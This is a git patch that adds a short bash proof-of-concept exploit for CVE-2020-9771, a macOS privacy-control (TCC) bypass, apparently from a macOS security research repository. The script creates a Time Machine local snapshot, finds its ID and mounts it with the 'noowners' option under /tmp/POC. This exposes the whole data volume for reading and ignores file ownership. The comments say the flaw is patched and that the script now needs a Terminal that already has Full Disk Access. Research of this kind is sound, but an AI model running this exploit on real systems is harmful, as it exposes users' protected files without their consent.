From b2c21cd37ddc724d44b58478c27c0a6efb528f8a Mon Sep 17 00:00:00 2001
From: Karmaz95 <karol.mazurek95@gmail.com>
Date: Mon, 11 Nov 2024 21:45:45 +0100
Subject: [PATCH] Adding PoC for CVE-2020-9771 TCC Bypass for FDA Terminal
 exploitation

---
 IX. TCC/custom/FDA_mount_apfs.sh | 19 +++++++++++++++++++
 1 file changed, 19 insertions(+)
 create mode 100644 IX. TCC/custom/FDA_mount_apfs.sh

diff --git a/IX. TCC/custom/FDA_mount_apfs.sh b/IX. TCC/custom/FDA_mount_apfs.sh
new file mode 100644
index 0000000..368c395
--- /dev/null
+++ b/IX. TCC/custom/FDA_mount_apfs.sh	
@@ -0,0 +1,19 @@
+#!/bin/bash
+# PoC: CVE-2020-9771 TCC Bypass – It was patched by TCC Full Disk Access (FDA).
+# Still, Terminal with FDA can read the contents of the whole system.
+# https://theevilbit.github.io/posts/cve_2020_9771/
+
+# Create a new local snapshot
+tmutil localsnapshot
+
+# Automatically retrieve the latest snapshot ID
+SNAPSHOT_ID=$(tmutil listlocalsnapshots / | grep 'com.apple.TimeMachine' | tail -n 1 | awk '{print $NF}')
+
+# Define the mount point (create if it doesn't exist)
+MOUNT_DIR="/tmp/POC"
+mkdir -p "$MOUNT_DIR"
+
+# Mount the latest snapshot with noowners option
+/sbin/mount_apfs -o noowners -s "$SNAPSHOT_ID" /System/Volumes/Data "$MOUNT_DIR"
+
+echo "Snapshot mounted at $MOUNT_DIR"
\ No newline at end of file